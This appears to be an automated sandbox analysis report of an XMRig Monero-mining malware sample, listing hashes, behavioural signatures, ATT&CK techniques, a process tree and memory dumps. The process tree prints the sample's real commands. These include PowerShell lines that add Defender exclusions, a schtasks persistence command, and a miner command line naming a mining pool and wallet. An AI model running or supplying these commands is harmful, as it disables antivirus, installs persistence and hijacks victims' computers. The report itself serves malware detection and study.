xmrig | eccd8fda543e347a08e9a5544f273ef1234759547e856ad5e5e8f42b736abc44

General

Target

eccd8fda543e347a08e9a5544f273ef1234759547e856ad5e5e8f42b736abc44.exe
Size

1.9MB
MD5

d4f02ef4a2cb3565936b019cac1c5db5
SHA1

7614355d41817f7f87aab4dcb77762aaf31f3a4a
SHA256

eccd8fda543e347a08e9a5544f273ef1234759547e856ad5e5e8f42b736abc44
SHA512

8ab773f56bbc9e0586facfdd349e79e32d4d61a2c106091aee53da0d18d09bee9faa077db18fefce884e35e3e3df60bc8e9901b5f3e5a4519519c88364c12cb1
SSDEEP

49152:L2d8gd1orIde6fk6TwHdPtBqYiV6fFKCzYSHhdMe2hVq2RWrsgzfr8E:L2Wgd1orIdeWk6odPXqY3tDlMe2ho2Rk

Score

10^/10

xmrig miner

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 6 IoCs

miner

Processes:

resource	yara_rule
behavioral1/memory/2812-303-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/2812-304-0x0000000140343234-mapping.dmp	xmrig
behavioral1/memory/2812-305-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/2812-308-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/2812-312-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/2812-314-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig

Executes dropped EXE 1 IoCs

Processes:

PWOJ.exe

pid process

4928 PWOJ.exe
Uses the VBS compiler for execution 1 TTPs

Scripting
T1064
Suspicious use of SetThreadContext 1 IoCs

Processes:

PWOJ.exe

description pid process target process

PID 4928 set thread context of 2812 4928 PWOJ.exe vbc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

4652 schtasks.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

4976 timeout.exe

pid	process
4928	PWOJ.exe

description	pid	process	target process
PID 4928 set thread context of 2812	4928	PWOJ.exe	vbc.exe

pid	process
4652	schtasks.exe

pid	process
4976	timeout.exe

Suspicious behavior: EnumeratesProcesses 18 IoCs

Processes:

eccd8fda543e347a08e9a5544f273ef1234759547e856ad5e5e8f42b736abc44.exepowershell.exepowershell.exePWOJ.exepowershell.exepowershell.exe

pid	process
3512	eccd8fda543e347a08e9a5544f273ef1234759547e856ad5e5e8f42b736abc44.exe
3512	eccd8fda543e347a08e9a5544f273ef1234759547e856ad5e5e8f42b736abc44.exe
4864	powershell.exe
4968	powershell.exe
4864	powershell.exe
4968	powershell.exe
4864	powershell.exe
4968	powershell.exe
4928	PWOJ.exe
4928	PWOJ.exe
4152	powershell.exe
5056	powershell.exe
5056	powershell.exe
4152	powershell.exe
5056	powershell.exe
4152	powershell.exe
4928	PWOJ.exe
4928	PWOJ.exe

Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

660

pid	process
660

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

eccd8fda543e347a08e9a5544f273ef1234759547e856ad5e5e8f42b736abc44.exepowershell.exepowershell.exePWOJ.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	3512	eccd8fda543e347a08e9a5544f273ef1234759547e856ad5e5e8f42b736abc44.exe
Token: SeDebugPrivilege	4864	powershell.exe
Token: SeDebugPrivilege	4968	powershell.exe
Token: SeIncreaseQuotaPrivilege	4968	powershell.exe
Token: SeIncreaseQuotaPrivilege	4864	powershell.exe
Token: SeSecurityPrivilege	4968	powershell.exe
Token: SeSecurityPrivilege	4864	powershell.exe
Token: SeTakeOwnershipPrivilege	4968	powershell.exe
Token: SeTakeOwnershipPrivilege	4864	powershell.exe
Token: SeLoadDriverPrivilege	4968	powershell.exe
Token: SeLoadDriverPrivilege	4864	powershell.exe
Token: SeSystemProfilePrivilege	4968	powershell.exe
Token: SeSystemProfilePrivilege	4864	powershell.exe
Token: SeSystemtimePrivilege	4968	powershell.exe
Token: SeSystemtimePrivilege	4864	powershell.exe
Token: SeProfSingleProcessPrivilege	4968	powershell.exe
Token: SeProfSingleProcessPrivilege	4864	powershell.exe
Token: SeIncBasePriorityPrivilege	4968	powershell.exe
Token: SeIncBasePriorityPrivilege	4864	powershell.exe
Token: SeCreatePagefilePrivilege	4968	powershell.exe
Token: SeCreatePagefilePrivilege	4864	powershell.exe
Token: SeBackupPrivilege	4968	powershell.exe
Token: SeBackupPrivilege	4864	powershell.exe
Token: SeRestorePrivilege	4968	powershell.exe
Token: SeRestorePrivilege	4864	powershell.exe
Token: SeShutdownPrivilege	4968	powershell.exe
Token: SeShutdownPrivilege	4864	powershell.exe
Token: SeDebugPrivilege	4968	powershell.exe
Token: SeDebugPrivilege	4864	powershell.exe
Token: SeSystemEnvironmentPrivilege	4968	powershell.exe
Token: SeSystemEnvironmentPrivilege	4864	powershell.exe
Token: SeRemoteShutdownPrivilege	4968	powershell.exe
Token: SeRemoteShutdownPrivilege	4864	powershell.exe
Token: SeUndockPrivilege	4968	powershell.exe
Token: SeUndockPrivilege	4864	powershell.exe
Token: SeManageVolumePrivilege	4968	powershell.exe
Token: SeManageVolumePrivilege	4864	powershell.exe
Token: 33	4968	powershell.exe
Token: 33	4864	powershell.exe
Token: 34	4968	powershell.exe
Token: 34	4864	powershell.exe
Token: 35	4968	powershell.exe
Token: 35	4864	powershell.exe
Token: 36	4968	powershell.exe
Token: 36	4864	powershell.exe
Token: SeDebugPrivilege	4928	PWOJ.exe
Token: SeDebugPrivilege	4152	powershell.exe
Token: SeDebugPrivilege	5056	powershell.exe
Token: SeIncreaseQuotaPrivilege	5056	powershell.exe
Token: SeSecurityPrivilege	5056	powershell.exe
Token: SeTakeOwnershipPrivilege	5056	powershell.exe
Token: SeLoadDriverPrivilege	5056	powershell.exe
Token: SeSystemProfilePrivilege	5056	powershell.exe
Token: SeSystemtimePrivilege	5056	powershell.exe
Token: SeProfSingleProcessPrivilege	5056	powershell.exe
Token: SeIncBasePriorityPrivilege	5056	powershell.exe
Token: SeCreatePagefilePrivilege	5056	powershell.exe
Token: SeBackupPrivilege	5056	powershell.exe
Token: SeRestorePrivilege	5056	powershell.exe
Token: SeShutdownPrivilege	5056	powershell.exe
Token: SeDebugPrivilege	5056	powershell.exe
Token: SeSystemEnvironmentPrivilege	5056	powershell.exe
Token: SeRemoteShutdownPrivilege	5056	powershell.exe
Token: SeUndockPrivilege	5056	powershell.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

vbc.exe

pid process

2812 vbc.exe

pid	process
2812	vbc.exe

Suspicious use of WriteProcessMemory 32 IoCs

Processes:

eccd8fda543e347a08e9a5544f273ef1234759547e856ad5e5e8f42b736abc44.execmd.exePWOJ.execmd.exe

description	pid	process	target process
PID 3512 wrote to memory of 4864	3512	eccd8fda543e347a08e9a5544f273ef1234759547e856ad5e5e8f42b736abc44.exe	powershell.exe
PID 3512 wrote to memory of 4864	3512	eccd8fda543e347a08e9a5544f273ef1234759547e856ad5e5e8f42b736abc44.exe	powershell.exe
PID 3512 wrote to memory of 4968	3512	eccd8fda543e347a08e9a5544f273ef1234759547e856ad5e5e8f42b736abc44.exe	powershell.exe
PID 3512 wrote to memory of 4968	3512	eccd8fda543e347a08e9a5544f273ef1234759547e856ad5e5e8f42b736abc44.exe	powershell.exe
PID 3512 wrote to memory of 3668	3512	eccd8fda543e347a08e9a5544f273ef1234759547e856ad5e5e8f42b736abc44.exe	cmd.exe
PID 3512 wrote to memory of 3668	3512	eccd8fda543e347a08e9a5544f273ef1234759547e856ad5e5e8f42b736abc44.exe	cmd.exe
PID 3668 wrote to memory of 4976	3668	cmd.exe	timeout.exe
PID 3668 wrote to memory of 4976	3668	cmd.exe	timeout.exe
PID 3668 wrote to memory of 4928	3668	cmd.exe	PWOJ.exe
PID 3668 wrote to memory of 4928	3668	cmd.exe	PWOJ.exe
PID 4928 wrote to memory of 4152	4928	PWOJ.exe	powershell.exe
PID 4928 wrote to memory of 4152	4928	PWOJ.exe	powershell.exe
PID 4928 wrote to memory of 5056	4928	PWOJ.exe	powershell.exe
PID 4928 wrote to memory of 5056	4928	PWOJ.exe	powershell.exe
PID 4928 wrote to memory of 4520	4928	PWOJ.exe	cmd.exe
PID 4928 wrote to memory of 4520	4928	PWOJ.exe	cmd.exe
PID 4520 wrote to memory of 4652	4520	cmd.exe	schtasks.exe
PID 4520 wrote to memory of 4652	4520	cmd.exe	schtasks.exe
PID 4928 wrote to memory of 2812	4928	PWOJ.exe	vbc.exe
PID 4928 wrote to memory of 2812	4928	PWOJ.exe	vbc.exe
PID 4928 wrote to memory of 2812	4928	PWOJ.exe	vbc.exe
PID 4928 wrote to memory of 2812	4928	PWOJ.exe	vbc.exe
PID 4928 wrote to memory of 2812	4928	PWOJ.exe	vbc.exe
PID 4928 wrote to memory of 2812	4928	PWOJ.exe	vbc.exe
PID 4928 wrote to memory of 2812	4928	PWOJ.exe	vbc.exe
PID 4928 wrote to memory of 2812	4928	PWOJ.exe	vbc.exe
PID 4928 wrote to memory of 2812	4928	PWOJ.exe	vbc.exe
PID 4928 wrote to memory of 2812	4928	PWOJ.exe	vbc.exe
PID 4928 wrote to memory of 2812	4928	PWOJ.exe	vbc.exe
PID 4928 wrote to memory of 2812	4928	PWOJ.exe	vbc.exe
PID 4928 wrote to memory of 2812	4928	PWOJ.exe	vbc.exe
PID 4928 wrote to memory of 2812	4928	PWOJ.exe	vbc.exe

C:\Users\Admin\AppData\Local\Temp\eccd8fda543e347a08e9a5544f273ef1234759547e856ad5e5e8f42b736abc44.exe
"C:\Users\Admin\AppData\Local\Temp\eccd8fda543e347a08e9a5544f273ef1234759547e856ad5e5e8f42b736abc44.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3512

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4864

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4968

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpC577.tmp.bat""
2⤵
- Suspicious use of WriteProcessMemory
PID:3668

C:\Windows\system32\timeout.exe
timeout 3
3⤵
- Delays execution with timeout.exe
PID:4976

C:\ProgramData\netcore\PWOJ.exe
"C:\ProgramData\netcore\PWOJ.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4928

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4152

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5056

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "PWOJ" /tr "C:\ProgramData\netcore\PWOJ.exe"
4⤵
- Suspicious use of WriteProcessMemory
PID:4520

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "PWOJ" /tr "C:\ProgramData\netcore\PWOJ.exe"
5⤵
- Creates scheduled task(s)
PID:4652

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o xmr-eu1.nanopool.org:14433 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQoBJqYKAGMEQrLE8L8 --tls --coin monero
4⤵
- Suspicious use of FindShellTrayWindow
PID:2812

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scripting

1

T1064

Scheduled Task

1

T1053

Persistence

Scheduled Task

1

T1053

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

Scripting

1

T1064

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\netcore\PWOJ.exe
Filesize
1.9MB

MD5
d4f02ef4a2cb3565936b019cac1c5db5

SHA1
7614355d41817f7f87aab4dcb77762aaf31f3a4a

SHA256
eccd8fda543e347a08e9a5544f273ef1234759547e856ad5e5e8f42b736abc44

SHA512
8ab773f56bbc9e0586facfdd349e79e32d4d61a2c106091aee53da0d18d09bee9faa077db18fefce884e35e3e3df60bc8e9901b5f3e5a4519519c88364c12cb1

Download Submit
C:\ProgramData\netcore\PWOJ.exe
Filesize
1.9MB

MD5
d4f02ef4a2cb3565936b019cac1c5db5

SHA1
7614355d41817f7f87aab4dcb77762aaf31f3a4a

SHA256
eccd8fda543e347a08e9a5544f273ef1234759547e856ad5e5e8f42b736abc44

SHA512
8ab773f56bbc9e0586facfdd349e79e32d4d61a2c106091aee53da0d18d09bee9faa077db18fefce884e35e3e3df60bc8e9901b5f3e5a4519519c88364c12cb1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
3KB

MD5
8592ba100a78835a6b94d5949e13dfc1

SHA1
63e901200ab9a57c7dd4c078d7f75dcd3b357020

SHA256
fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c

SHA512
87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
64191d994c2407a8e837d756ba202d45

SHA1
b162b5de55945d6002941f5e85eb1b5c43047922

SHA256
6e6da12ec6ac57b79496f4561e6ce82e22aa92da8b1d3182501c2f82ceccbe5a

SHA512
2688d855840d7670c593b5a5d8e48f5648cce14feada5a0581038246a11a6ffa386e9fd7b844dd0b44df1553106498747f18b8744bf95d6704100cb930856bed

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
64191d994c2407a8e837d756ba202d45

SHA1
b162b5de55945d6002941f5e85eb1b5c43047922

SHA256
6e6da12ec6ac57b79496f4561e6ce82e22aa92da8b1d3182501c2f82ceccbe5a

SHA512
2688d855840d7670c593b5a5d8e48f5648cce14feada5a0581038246a11a6ffa386e9fd7b844dd0b44df1553106498747f18b8744bf95d6704100cb930856bed

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
4c4ed7f5968be904a402583635085c24

SHA1
01dd5610524106a29bf0054cd6b605ef3413460a

SHA256
f4296a236fab06b2657c5df9488eb1923c2b5ca50430d6cc20bc55db1105e9e1

SHA512
7618da09569fe23f7f5e78e2a87fa33558837d9fa9c20ce7cdaeb340638e314e8a5c55790ce237618c79b02eb6b7765eb25ad1adc607114d86ab2ca820fe6b55

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpC577.tmp.bat
Filesize
140B

MD5
477d99baa1fe0a25c528735061863176

SHA1
31cf4043c9967a8f4cef37d21a44ce1092ae5792

SHA256
879aa8f4e8a6a9111d12cf1ee4b54c13763ca423644899b861d07bdef89e7523

SHA512
31ab91a51f366a0bbb85b2a0a439df563c8adb869ea87ae1d32147bde0fa96728d8bdb14f1e99380f02e6c870f31f2e4c02e2e55906a52eaa1d8145d48e5d9ca

Download Submit
memory/2812-309-0x0000025921270000-0x0000025921290000-memory.dmp

Filesize
128KB

Download
memory/2812-316-0x0000025922CF0000-0x0000025922D10000-memory.dmp

Filesize
128KB

Download
memory/2812-303-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/2812-304-0x0000000140343234-mapping.dmp

Download
memory/2812-305-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/2812-319-0x0000025922CF0000-0x0000025922D10000-memory.dmp

Filesize
128KB

Download
memory/2812-308-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/2812-312-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/2812-313-0x0000025922CB0000-0x0000025922CF0000-memory.dmp

Filesize
256KB

Download
memory/2812-314-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/2812-318-0x00000259212E0000-0x0000025921300000-memory.dmp

Filesize
128KB

Download
memory/2812-315-0x00000259212E0000-0x0000025921300000-memory.dmp

Filesize
128KB

Download
memory/3512-135-0x0000000000A80000-0x0000000000D5E000-memory.dmp

Filesize
2.9MB

Download
memory/3512-119-0x00007FFF90EA0000-0x00007FFF90F3C000-memory.dmp

Filesize
624KB

Download
memory/3512-126-0x0000000000A80000-0x0000000000D5E000-memory.dmp

Filesize
2.9MB

Download
memory/3512-125-0x00007FFF905C0000-0x00007FFF906B7000-memory.dmp

Filesize
988KB

Download
memory/3512-124-0x00007FFF99090000-0x00007FFF990A1000-memory.dmp

Filesize
68KB

Download
memory/3512-136-0x0000000000850000-0x0000000000893000-memory.dmp

Filesize
268KB

Download
memory/3512-128-0x0000000000850000-0x0000000000893000-memory.dmp

Filesize
268KB

Download
memory/3512-120-0x00007FFF9B480000-0x00007FFF9B51D000-memory.dmp

Filesize
628KB

Download
memory/3512-121-0x00007FFF9B0E0000-0x00007FFF9B18E000-memory.dmp

Filesize
696KB

Download
memory/3512-122-0x00007FFF9B190000-0x00007FFF9B1B7000-memory.dmp

Filesize
156KB

Download
memory/3512-130-0x00007FFF900B0000-0x00007FFF901DC000-memory.dmp

Filesize
1.2MB

Download
memory/3512-129-0x0000000000A80000-0x0000000000D5E000-memory.dmp

Filesize
2.9MB

Download
memory/3512-127-0x00007FFF81750000-0x00007FFF8213C000-memory.dmp

Filesize
9.9MB

Download
memory/3512-123-0x00007FFF9B520000-0x00007FFF9B66A000-memory.dmp

Filesize
1.3MB

Download
memory/3668-133-0x0000000000000000-mapping.dmp

Download
memory/4152-226-0x0000000000000000-mapping.dmp

Download
memory/4520-231-0x0000000000000000-mapping.dmp

Download
memory/4652-237-0x0000000000000000-mapping.dmp

Download
memory/4864-150-0x00000207B8140000-0x00000207B81B6000-memory.dmp

Filesize
472KB

Download
memory/4864-131-0x0000000000000000-mapping.dmp

Download
memory/4928-213-0x00007FFF905C0000-0x00007FFF906B7000-memory.dmp

Filesize
988KB

Download
memory/4928-307-0x0000000001450000-0x0000000001493000-memory.dmp

Filesize
268KB

Download
memory/4928-221-0x00007FFF8FD40000-0x00007FFF8FE6C000-memory.dmp

Filesize
1.2MB

Download
memory/4928-220-0x0000000000960000-0x0000000000C3E000-memory.dmp

Filesize
2.9MB

Download
memory/4928-219-0x0000000000960000-0x0000000000C3E000-memory.dmp

Filesize
2.9MB

Download
memory/4928-272-0x00007FFF98F20000-0x00007FFF98F45000-memory.dmp

Filesize
148KB

Download
memory/4928-276-0x00007FFF8FE70000-0x00007FFF8FE95000-memory.dmp

Filesize
148KB

Download
memory/4928-278-0x00007FFF7B360000-0x00007FFF7B42C000-memory.dmp

Filesize
816KB

Download
memory/4928-280-0x00007FFF9A520000-0x00007FFF9A58C000-memory.dmp

Filesize
432KB

Download
memory/4928-292-0x00007FFF986A0000-0x00007FFF986D7000-memory.dmp

Filesize
220KB

Download
memory/4928-214-0x00007FFF81750000-0x00007FFF8213C000-memory.dmp

Filesize
9.9MB

Download
memory/4928-206-0x00007FFF9B480000-0x00007FFF9B51D000-memory.dmp

Filesize
628KB

Download
memory/4928-208-0x00007FFF9B0E0000-0x00007FFF9B18E000-memory.dmp

Filesize
696KB

Download
memory/4928-317-0x0000000000960000-0x0000000000C3E000-memory.dmp

Filesize
2.9MB

Download
memory/4928-212-0x00007FFF99090000-0x00007FFF990A1000-memory.dmp

Filesize
68KB

Download
memory/4928-306-0x0000000000960000-0x0000000000C3E000-memory.dmp

Filesize
2.9MB

Download
memory/4928-211-0x00007FFF9B520000-0x00007FFF9B66A000-memory.dmp

Filesize
1.3MB

Download
memory/4928-210-0x00007FFF9B190000-0x00007FFF9B1B7000-memory.dmp

Filesize
156KB

Download
memory/4928-209-0x0000000001450000-0x0000000001493000-memory.dmp

Filesize
268KB

Download
memory/4928-207-0x0000000000960000-0x0000000000C3E000-memory.dmp

Filesize
2.9MB

Download
memory/4928-205-0x00007FFF90EA0000-0x00007FFF90F3C000-memory.dmp

Filesize
624KB

Download
memory/4928-200-0x0000000000000000-mapping.dmp

Download
memory/4968-144-0x0000014D7E0A0000-0x0000014D7E0C2000-memory.dmp

Filesize
136KB

Download
memory/4968-132-0x0000000000000000-mapping.dmp

Download
memory/4976-147-0x0000000000000000-mapping.dmp

Download
memory/5056-227-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads